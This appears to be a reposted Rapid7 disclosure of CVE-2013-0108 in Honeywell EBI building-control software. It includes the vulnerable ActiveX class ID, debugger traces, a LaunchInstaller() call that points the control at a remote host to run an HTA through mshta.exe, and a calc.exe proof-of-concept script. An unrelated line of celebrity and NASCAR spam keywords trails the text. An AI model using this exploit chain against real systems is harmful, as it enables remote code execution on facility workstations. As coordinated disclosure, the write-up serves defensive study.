Today, we present to you a new vulnerability, CVE-2013-0108, discovered in Honeywell Enterprise Buildings Integrator (EBI) R310 - R410.2. This platform is used to integrate different systems and devices such as heating, ventilation, and air conditioning (HVAC) controls; security; access control; life safety; lighting; energy management; and facilities management into a common platform. Using open architecture and industry standards, EBI integrates existing buildings systems, providing seamless digital information and control across all building operational management systems." Following our standard disclosure policy, we notified both Honeywell and CERT/CC, who in turn coordinated with ICS-CERT. Quoting from the ICS-CERT advisory ICSA-13-053-02:
?
Exploitation of this vulnerability could allow partial loss of availability, integrity, and confidentiality and could be exploited remotely. This vulnerability could affect systems deployed in the government facilities and commercial facilities sectors.
?
?
The vulnerability could allow remote attackers to execute arbitrary code via a specially crafted HTML document. The attacker would require an end-user or operator to voluntarily interact with the attack mechanism for it to be successful. For example, the attacker could send an email message to the end-user, containing a link to a Web site with the specially crafted HTML document. CVE-2013-0108 has been assigned to this vulnerability with a CVSS v2 base score of 6.8.
?
?
Now, before you read any further, if you own or operate one of these building control systems, you really should take a few moments and spend quality time with your Honeywell sales and service representative to ask about getting the latest Station Security Update Package. When we first reported this to Honeywell, their responsiveness and concern was both prompt and thorough, so it's clear to all of us at Rapid7 that Honeywell definitely has their customers' security interests at heart. From a disclosure standpoint, Honeywell's response was A++++, would exploit again. (:
?
Vulnerability Summary
?
The specific flaw exists within the HSC Remote Deploy ActiveX (HSCRemoteDeploy.dll), with the class ID "0D080D7D-28D2-4F86-BFA1-D582E5CE4867". This control is used to support installation of Honeywell HMIWeb Browser on workstation clients. The LaunchInstaller() method, provided by the vulnerable control, can be abused to run an arbitrary HTA application through mshta.exe.
?
Disclosure Timeline
?
| Date | Description |
|---|---|
| 2013-01-08 | Initial discovery by Juan Vazquez, Metasploit Researcher |
| 2013-01-08 | Metasploit module written |
| 2013-01-10 | Initial disclosure to the vendor, Honeywell |
| 2013-01-10 | Initial response from the vendor |
| 2013-01-25 | Disclosure to CERT/CC |
| 2013-01-30 | Disclosure coordination with vendor, CERT/CC, and ISC-CERT |
| 2013-02-04 | Vendor advisory bulletin and patch drafted |
| 2013-02-22 | Vendor advisory bulletin and patch release |
| 2013-02-22 | ISC-CERT Advisory published |
| 2013-03-11 | Public disclosure and Metasploit modules published |
| 2013-03-12 | Kill bits released on Microsoft Patch Tuesday (proposed) |
?
A remote page can make the Internet Explorer load the vulnerable ActiveX control by using its class ID:
?
<object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867">
?
The vulnerable ActiveX control will be loaded by Internet Explorer:
?
0:006> g ModLoad: 020b0000 020e7000?? C:\WINDOWS\system32\HSCRemoteDeploy.dll eax=00000003 ebx=00000000 ecx=020de070 edx=f20b0000 esi=00255ba8 edi=00000000 eip=7c90e4f4 esp=00137dc0 ebp=00137eb4 iopl=0???????? nv up ei pl zr na pe nc cs=001b? ss=0023? ds=0023? es=0023? fs=003b? gs=0000???????????? efl=00000246 ntdll!KiFastSystemCallRet: 7c90e4f4 c3????????????? ret 0:000> lmv m HSCRemoteDeploy start??? end??????? module name 020b0000 020e7000?? HSCRemoteDeploy?? (deferred)???????????? ??? Image path: C:\WINDOWS\system32\HSCRemoteDeploy.dll ??? Image name: HSCRemoteDeploy.dll ??? Timestamp:??????? Wed Sep 29 13:51:06 2010 (4CA3282A) ??? CheckSum:???????? 0003DCC8 ??? ImageSize:??????? 00037000 ??? File version:???? 5.7.165.119 ??? Product version:? 5.7.165.119 ??? File flags:?????? 0 (Mask 3F) ??? File OS:????????? 4 Unknown Win32 ??? File type:??????? 2.0 Dll ??? File date:??????? 00000000.00000000 ??? Translations:???? 0409.04b0 ??? CompanyName:????? Honeywell Limited ??? ProductName:????? HMIWeb ??? FileVersion:????? 5, 7, 165, 119 ??? PrivateBuild:???? Official build ??? FileDescription:? Unicode Release Build ??? LegalCopyright:?? Copyright 2008 Honeywell International S?rl ??? LegalTrademarks:? Copyright 2008 Honeywell International S?rl
?
Once loaded, the LaunchInstaller() method can be used to execute an arbitrary remote HTA application by specifying an arbitrary URI as "bstrParameter" parameter. The prototype for this method is described here:
?
Sub LaunchInstaller ( ???? ByVal bstrServer? As String , ???? ByVal bstrRedirect? As String , ???? ByVal bUpgrade? As Boolean )
?
It can be abused in code such as:
?
RemoteInstaller.LaunchInstaller("http://192.168.1.128:8080", "", false); ?
The above LaunchInstaller() call will translate to the next execution of ShellExecuteExW, with a pointer to the SHELLEXECUTEINFO structure stored in 0013e200 as argument:
?
0:000> bp HSCRemoteDeploy+866A 0:000> g Breakpoint 0 hit eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c eip=020b866a esp=0013e1ec ebp=0013e254 iopl=0???????? nv up ei pl zr na pe nc cs=001b? ss=0023? ds=0023? es=0023? fs=003b? gs=0000???????????? efl=00000246 HSCRemoteDeploy!DllUnregisterServer+0x2e4a: 020b866a ff10??????????? call??? dword ptr [eax]????? ds:0023:020d2644=d68d0b02 0:000> t eax=020d2644 ebx=0210246c ecx=021023e8 edx=0013e200 esi=00000000 edi=0013e26c eip=020b8dd6 esp=0013e1e8 ebp=0013e254 iopl=0???????? nv up ei pl zr na pe nc cs=001b? ss=0023? ds=0023? es=0023? fs=003b? gs=0000???????????? efl=00000246 HSCRemoteDeploy!DllUnregisterServer+0x35b6: 020b8dd6 ff253c120d02??? jmp???? dword ptr [HSCRemoteDeploy!DllUnregisterServer+0x1ba1c (020d123c)] ds:0023:020d123c={SHELL32!ShellExecuteExW (7ca02f03)} 0:000> dd esp L2 0013e1e8? 020b866c 0013e200 ?
The SHELLEXECUTEINFO used as parameter contains the next values:
?
?
?
? 0:000> du poi(0013e200+C) 021040ac? "open" 0:000> du poi(0013e200+10) 0210246c? "C:\WINDOWS\system32\mshta.exe" 0:000> du poi(0013e200+14)02104014? "http : //192.168.1.128:8080/System" 02104054? "Displays/RemoteInstallWelcome.ht" 02104094? "a"
?
The location of the HTA application to be opened via mshta.exe can be influenced by the "bstrServer" parameter, which leads to remote HTA code execution.
?
Exploitation
?
Since arbitrary HTA application execution is possible, according to the MSDN article Introduction to HTML Applications (HTAs), arbitrary code execution will be possible:
As fully trusted applications, HTAs carry out actions that Internet Explorer would never permit in a webpage. The result is an application that runs seamlessly, without interruption.
?
In HTAs, the restrictions against allowing script to manipulate the client machine are lifted. For example, all command codes are supported without scripting limitations (see command id). And HTAs have read/write access to the files and system registry on the client machine.
?
The trusted status of HTAs also extends to all operations subject to security zone options. In short, zone security is off. Consequently, HTAs run embedded Microsoft ActiveX controls and Java applets irrespective of the zone security setting on the client machine. No warning displays before such objects are run within an HTA. HTAs run outside of the Internet Explorer process, and therefore are not subject to the security restrictions imposed by Protected Mode when run on Windows Vista.
As a simple proof of concept, the next HTA application can be used to launch calc.exe:
?
<script> a=new ActiveXObject("WScript.Shell"); a.run('%windir%\\\\System32\\\\calc.exe'); window.close(); </script> ?
In order to achieve remote code execution a Metasploit module has been developed. The module has been tested successfully on Windows XP and Windows 7 operating systems with Internet Explorer 6 to Internet Explorer 9:
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.
Source: https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi
angelina jolie leg daytona artie lange nascar daytona 2012 kasey kahne angelina jolie right leg saving face
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.